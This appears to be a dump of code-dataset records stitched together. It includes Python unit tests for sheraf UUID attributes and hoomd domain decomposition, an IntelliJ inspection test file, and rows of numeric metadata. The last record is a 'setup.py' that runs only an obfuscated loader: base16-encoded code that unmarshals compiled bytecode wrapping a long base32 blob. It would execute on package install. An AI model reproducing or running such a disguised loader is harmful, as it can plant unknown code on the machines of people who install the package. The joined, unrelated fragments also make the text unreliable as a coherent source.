m = UUIDModel.create(my_uuid=uuid.uuid4())
assert isinstance(m.mapping["my_uuid"], numbers.Number)
assert isinstance(m.my_uuid, uuid.UUID)
def test_create_with_an_existing_uuid_str(sheraf_database):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
with sheraf.connection():
m = UUIDModel.create(my_uuid=str(uuid.uuid4()))
assert isinstance(m.mapping["my_uuid"], numbers.Number)
assert isinstance(m.my_uuid, uuid.UUID)
def test_create_with_an_existing_uuid_int(sheraf_database):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
with sheraf.connection():
m = UUIDModel.create(my_uuid=uuid.uuid4().int)
assert isinstance(m.mapping["my_uuid"], numbers.Number)
assert isinstance(m.my_uuid, uuid.UUID)
def test_string_uuid_attribute(sheraf_database):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.StringUUIDAttribute()
with sheraf.connection():
m = UUIDModel.create(my_uuid=uuid.uuid4().int)
assert isinstance(m.mapping["my_uuid"], numbers.Number)
assert isinstance(m.my_uuid, str)
def test_reset_str_uuid_to_none(sheraf_connection):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.StringUUIDAttribute()
m = UUIDModel.create()
m.my_uuid = uuid.uuid4()
m = UUIDModel.read(m.id)
assert isinstance(m.my_uuid, str)
m.my_uuid = None
m = UUIDModel.read(m.id)
assert m.my_uuid is None
| 26.677083
| 63
| 0.699336
| 335
| 2,561
| 5.128358
| 0.125373
| 0.104773
| 0.057043
| 0.14901
| 0.896973
| 0.896973
| 0.893481
| 0.87078
| 0.829453
| 0.795693
| 0
| 0.002913
| 0.195627
| 2,561
| 95
| 64
| 26.957895
| 0.831068
| 0
| 0
| 0.738462
| 0
| 0
| 0.012495
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.123077
| false
| 0
| 0.076923
| 0
| 0.446154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64c131c0abcaf0ae4c03e11dc8fd75e05503c60d
| 261
|
py
|
Python
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo():
global <weak_warning descr="Global variable 'var' is undefined at the module level">var</weak_warning>
var = 1
def bar():
global <weak_warning descr="Global variable 'var' is undefined at the module level">var</weak_warning>
var = 2
| 32.625
| 106
| 0.704981
| 40
| 261
| 4.5
| 0.425
| 0.244444
| 0.188889
| 0.244444
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0
| 0.009434
| 0.187739
| 261
| 8
| 107
| 32.625
| 0.839623
| 0
| 0
| 0.333333
| 0
| 0
| 0.412214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
64dc112bb90b4b3a79a943bb2485181dfda3398d
| 22,364
|
py
|
Python
|
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | 2
|
2020-03-30T14:38:50.000Z
|
2020-06-02T05:53:41.000Z
|
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | null | null | null |
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | 1
|
2020-05-20T07:00:08.000Z
|
2020-05-20T07:00:08.000Z
|
# -*- coding: iso-8859-1 -*-
# Maintainer: mphoward
from hoomd import *
import hoomd;
context.initialize()
import unittest
## Domain decomposition balancing tests
class decomposition_tests (unittest.TestCase):
## Test that no errors are raised if a uniform decomposition should be done
def test_uniform(self):
if comm.get_num_ranks() > 1:
box = data.boxdim(L=10)
boxdim = box._getBoxDim()
# test the default constructor, which should make a uniform decomposition
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# explicitly set the grid dimensions in the constructor
comm.decomposition(nx=2, ny=2, nz=2)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# shuffle dimensions
comm.decomposition(nx=2, ny=4, nz=1)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 5)
self.assertEquals(len(dd.getCumulativeFractions(2)), 2)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[4], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 1.0)
# shuffle dimensions
comm.decomposition(nx=4, ny=1, nz=2)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 5)
self.assertEquals(len(dd.getCumulativeFractions(1)), 2)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[4], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# shuffle dimensions
comm.decomposition(nx=1, ny=2, nz=4)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 2)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[4], 1.0)
## Test the fractions are set correctly
def test_basic_balance(self):
if comm.get_num_ranks() == 1:
comm.decomposition(x=0.5)
self.assertEqual(hoomd.context.current.decomposition, None)
elif comm.get_num_ranks() > 1:
box = data.boxdim(L=10)
boxdim = box._getBoxDim()
comm.decomposition(z=0.2)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.2)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
comm.decomposition(x=[0.2,0.3,0.1], y=0.3)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 5)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 2)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.2)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[3], 0.6)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[4], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.3)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 1.0)
## Test that script gracefully chooses among available options
def test_overspecify(self):
if comm.get_num_ranks() > 1:
box = data.boxdim(L=10)
boxdim = box._getBoxDim()
# this is wrong to set both, so it should fail
with self.assertRaises(RuntimeError):
comm.decomposition(x=[0.2,0.3,0.1], nx=2)
# set a global value, and try with nx arg set
hoomd.context.options.nx = 8
comm.decomposition(nx=4)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[4], 1.0)
# now fallback to the global one
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 9)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.125)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[3], 0.375)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[4], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[5], 0.625)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[6], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[7], 0.875)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[8], 1.0)
hoomd.context.options.nx = None # undo this so that it doesn't contaminate other dimensions
# this is wrong to set both, so it should fail
with self.assertRaises(RuntimeError):
comm.decomposition(y=[0.2,0.3,0.1], ny=2)
# set a global value, and try with ny arg set
hoomd.context.options.ny = 8
comm.decomposition(ny=4)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(1)), 5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[4], 1.0)
# now fallback to the global one
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(1)), 9)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.125)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[3], 0.375)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[4], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[5], 0.625)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[6], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[7], 0.875)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[8], 1.0)
hoomd.context.options.ny = None # undo this so that it doesn't contaminate other dimensions
# this is wrong to set both, so it should fail
with self.assertRaises(RuntimeError):
comm.decomposition(z=[0.2,0.3,0.1], nz=2)
# set a global value, and try with nz arg set
hoomd.context.options.nz = 8
comm.decomposition(nz=4)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(2)), 5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[4], 1.0)
# now fallback to the global one
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(2)), 9)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.125)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[3], 0.375)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[4], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[5], 0.625)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[6], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[7], 0.875)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[8], 1.0)
# the linear command should take precedence over the z command
hoomd.context.options.nz = 4
hoomd.context.options.linear = True
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(2)), 9)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.125)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[3], 0.375)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[4], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[5], 0.625)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[6], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[7], 0.875)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[8], 1.0)
# clear out these options so they don't contaminate other tests
hoomd.context.options.nz = None
hoomd.context.options.linear = None
## Test that balancing fails after initialization
def test_wrong_order(self):
init.create_lattice(lattice.sc(a=2.1878096788957757),n=[5,5,4]); #target a packing fraction of 0.05
with self.assertRaises(RuntimeError):
comm.decomposition(y=0.3)
context.initialize()
## Test that errors are raised if fractional divisions exceed 1.0
def test_bad_fractions(self):
if comm.get_num_ranks() > 1:
box = data.boxdim(L=10)
boxdim = box._getBoxDim()
with self.assertRaises(RuntimeError):
comm.decomposition(x=-0.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(x=1.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(x=[0.2,0.9])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(x=[0.3,-0.1])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(y=-0.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(y=1.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(y=[0.2,0.9])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(y=[0.3,-0.1])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(z=-0.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(z=1.2)
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(z=[0.2,0.9])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
with self.assertRaises(RuntimeError):
comm.decomposition(z=[0.3,-0.1])
hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
## Test that parameters are set correctly
def test_set_params(self):
if comm.get_num_ranks() > 1:
dd = comm.decomposition(x=[0.3],y=[0.4],z=[0.6])
# check that the grid was set correctly in the constructor (via set_params)
self.assertFalse(hoomd.context.current.decomposition.uniform_x)
self.assertFalse(hoomd.context.current.decomposition.uniform_y)
self.assertFalse(hoomd.context.current.decomposition.uniform_z)
self.assertAlmostEqual(hoomd.context.current.decomposition.x[0], 0.3)
self.assertAlmostEqual(hoomd.context.current.decomposition.y[0], 0.4)
self.assertAlmostEqual(hoomd.context.current.decomposition.z[0], 0.6)
# switch everything to a uniform grid (doesn't matter that it is infeasible, we aren't actually constructing it)
dd.set_params(nx=4)
dd.set_params(ny=5)
dd.set_params(nz=6)
self.assertTrue(hoomd.context.current.decomposition.uniform_x)
self.assertTrue(hoomd.context.current.decomposition.uniform_y)
self.assertTrue(hoomd.context.current.decomposition.uniform_z)
self.assertEqual(hoomd.context.current.decomposition.nx, 4)
self.assertEqual(hoomd.context.current.decomposition.ny, 5)
self.assertEqual(hoomd.context.current.decomposition.nz, 6)
# do it all in one function call to make sure this works
dd.set_params(nx=2, ny=3, nz=4)
self.assertTrue(hoomd.context.current.decomposition.uniform_x)
self.assertTrue(hoomd.context.current.decomposition.uniform_y)
self.assertTrue(hoomd.context.current.decomposition.uniform_z)
self.assertEqual(hoomd.context.current.decomposition.nx, 2)
self.assertEqual(hoomd.context.current.decomposition.ny, 3)
self.assertEqual(hoomd.context.current.decomposition.nz, 4)
# now back to a new non-uniform spacing
dd.set_params(x=0.6)
dd.set_params(y=0.4)
dd.set_params(z=0.3)
self.assertFalse(hoomd.context.current.decomposition.uniform_x)
self.assertFalse(hoomd.context.current.decomposition.uniform_y)
self.assertFalse(hoomd.context.current.decomposition.uniform_z)
self.assertAlmostEqual(hoomd.context.current.decomposition.x[0], 0.6)
self.assertAlmostEqual(hoomd.context.current.decomposition.y[0], 0.4)
self.assertAlmostEqual(hoomd.context.current.decomposition.z[0], 0.3)
# do it all at once
dd.set_params(x=[0.2,0.3], y=[0.4,0.1], z=[0.25,0.25])
self.assertFalse(hoomd.context.current.decomposition.uniform_x)
self.assertFalse(hoomd.context.current.decomposition.uniform_y)
self.assertFalse(hoomd.context.current.decomposition.uniform_z)
self.assertAlmostEqual(hoomd.context.current.decomposition.x[0], 0.2)
self.assertAlmostEqual(hoomd.context.current.decomposition.x[1], 0.3)
self.assertAlmostEqual(hoomd.context.current.decomposition.y[0], 0.4)
self.assertAlmostEqual(hoomd.context.current.decomposition.y[1], 0.1)
self.assertAlmostEqual(hoomd.context.current.decomposition.z[0], 0.25)
self.assertAlmostEqual(hoomd.context.current.decomposition.z[1], 0.25)
# try a mixture of things
dd.set_params(nx=3, y=0.8, nz=2)
self.assertTrue(hoomd.context.current.decomposition.uniform_x)
self.assertFalse(hoomd.context.current.decomposition.uniform_y)
self.assertTrue(hoomd.context.current.decomposition.uniform_z)
self.assertEqual(hoomd.context.current.decomposition.nx, 3)
self.assertAlmostEqual(hoomd.context.current.decomposition.y[0], 0.8)
self.assertEqual(hoomd.context.current.decomposition.nz, 2)
with self.assertRaises(RuntimeError):
dd.set_params(x=0.2, nx=4)
with self.assertRaises(RuntimeError):
dd.set_params(y=0.2, ny=4)
with self.assertRaises(RuntimeError):
dd.set_params(z=0.2, nz=4)
## Test for MPI barriers
class barrier_tests(unittest.TestCase):
def test_barrier(self):
comm.barrier();
def test_barrier_all(self):
comm.barrier_all();
if __name__ == '__main__':
unittest.main(argv = ['test.py', '-v'])
| 51.888631
| 124
| 0.658693
| 2,548
| 22,364
| 5.722527
| 0.073783
| 0.240313
| 0.194225
| 0.372265
| 0.893492
| 0.876963
| 0.872094
| 0.787189
| 0.772238
| 0.75859
| 0
| 0.046627
| 0.225139
| 22,364
| 430
| 125
| 52.009302
| 0.794795
| 0.069755
| 0
| 0.644654
| 0
| 0
| 0.000819
| 0
| 0
| 0
| 0
| 0
| 0.644654
| 1
| 0.025157
| false
| 0
| 0.009434
| 0
| 0.040881
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b3b6bc98aaf3bce48ce704bbd0de730e4ffdaf00
| 9,730
|
py
|
Python
|
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
# Script compilé par Faxel
# Twitter : https://twitter.com/faxelhs
import base64
from base64 import *
exec(base64.b16decode('232053637269707420636F6D70696CC3A92070617220466178656C0A232054776974746572203A2068747470733A2F2F747769747465722E636F6D2F666178656C68730A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732862275C7865335C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830385C7830305C7830305C783030405C7830305C7830305C78303073365C7830305C7830305C783030645C783030645C7830316C5C7830305A5C783030645C783030645C7830316C5C7830315A5C783031645C783030645C7830316C5C7830325A5C783032655C783033655C7830325C7861305C783034655C7830305C7861305C783035655C7830315C7861305C783036645C7830325C7861315C7830315C7861315C7830315C7861315C7830315C7838335C7830315C7830315C783030645C783031535C783030295C7830335C7865395C7830305C7830305C7830305C7830304E73505C7831305C7830305C78303050434F4C32574B334E374F4D4D46504753424F4334353556534C58564D33485A474A5553353556325747574E4C5758524957584F574E563636514A4357534D54584C454256414E5333594D345446455834523545514B585349494249464F515049574141424E5152323543564541334C5841454355494750375541374C5037414A4D413336425049564E50375A56445451324C364B55544C4C4E34555152484F5A534F4C5448425A4F504848505A574D4B4157534C355A58414B3733483448544453524351544442555357544A4955344753454D5A564D47464A5A3233494B42563233484C4F36514641494F5A493556525748524A4A54544F575933524A45494A363557484848554A524C4851534549364954344C4B49514157505936464B4854564A4A52554A4948453543574E534B574A4C5A5446344736595A4654324A504A4A525949565932554F574E59474444454F5741463542474733464D4D4947375A51334C44544D514E3551565747533333484C4D4D4E5657525657514F365233335041584D515636514F473347565A41333745584E4D4F355343483347434E5741375A465036424F57333333553655335244435735474C505836533452474B584F5343363750534E4E5A5043475354445149554E334B323435585758544B425536335A48323347374657494135345835505158564735524A524F35333455495934554A5A4250514B47553759484758353334554137444659323556584348554E324A354A4A504D4F564E46574E36515957544C5A524F425334474B4B4737434B51474B5A4544345635494E35374959464D325653494E424F4C535944573741424A4C5346413248594C544D4D43345458504F4B42373556594435324134363536464F4E41585046333547454D4F57534E5947484C5A595A324A4E4F5052444C434C52554F4B544E4C59485852324E484E354F4950525352434D48534C554B5457374A4645365A4A4B424C554A495A4B5A594D5A46475142415055334649484A3732524E47324C5A4D57544E4C594B4E4B4C4B554C55585649484E475A584234474F374A37484F4E3555324544453445555A455A37484E484842504656534F4154354A5A54413341485A5A5436423346454A51564B564B43414E4651364E503750505634353736505446354E53494934354249375433454C51444B4A424B55474B58425A453536504536564B594655585732514B594645574A574C33424156484A354F365945333341335547564853564C5A32444B4958424E51594E4151425753374847413337465136434D33413741364333544E58414C5846584B4832435A4546353447335452335548564857564A564554475A424F4835455545484A414B5137354B36424F33334B454C4647535337514754555A52425953544C535356534E5953584552525057424146434F424A43574E4B564C44434A505A364E54345254535032475055564F3333534B37594C494B5648434935514E544D524C4C584F3734554B41514A45373741564146544148485046465959594A565843334948575451574D444D59563244444A574D5445584D4B35425A555A4447464F5A434F4C49544747554E475558364E5648355154484A54544D4B57364A4F493334324255484943374E46524556374B455A53595A54324E445937573250375A33504F424C504F354A334D4C3435504952545246515A4C343559545937375849595735584F4E375651534F334B324C50443657424853524C504A4F344F4D364935474455333254334C564A4257585A4D34474D3647424742354759484E50344E345635543748544453514C3252324147364C4636564F325754495034324B3337584A4D3343374B444A4E4947594C434841504A4D3642454A53424756334B474F51504B5836373454324245333652595542355A32335159485559334143544836514533445A5754455652354C3352334C524E4932594A56505256485251544C4656554F334C324A4849434F5833354259583633545A554B5044355A5057514C545447334B453554474E4A544D564C55334F415A4A43485158354950505733424546523357425A505359524C4B35584D46323653484337544B4E344F554F53464F444C5644594F444E51364F544C5552585735453736475A4454504A57494E535245514A4F545236413457594E584650423455373354353658534E3533493737363635374837515259574E4C33424C474B58355837325A524D565435434F564F545A4A51544A4A56534C344D51324F4D574B53554E4E584C3258544D4B5154475635564D4B584A4C4B52465753584A424F5445574A484B425033374B543543525544544A36413744494132494736594548354D4E4F413756575950365951544B59544E33494C58565A443337335045534333415947334A525A32564858344A5536344E4F36335335374E345943353544354533335847505743483553374533555433544759584633504A504F554F45465135334C58454C4F44564A3433454F4D52344A4A4A444C4E4734593644475A4E45573653374B485949555A554F58474354453757584F3246514D58594A374C3536574A364757573656414B4D32324A34464151464156565A424B4E54464E4642574257334E49543633514B414E434E544536585137564950513752485237433742435846344D4C3454524250534F4646344A4D4F4C5A56525537324C57504D4533334F4736375A3758514559355632484D324258414E434D4F4D47504F494F58565744443353533533494558333658333652424F3733335148334D4F424558364D57424652324E5252505A5854444E43553235594B5A4354594C32594E544D5A515844464A58523334485743504E35523332374956453636564357583758413753364E334F4B5A375641325A32335A32334A59425650564B4A44325A32365642545637544635523759514D48365649535235434E5651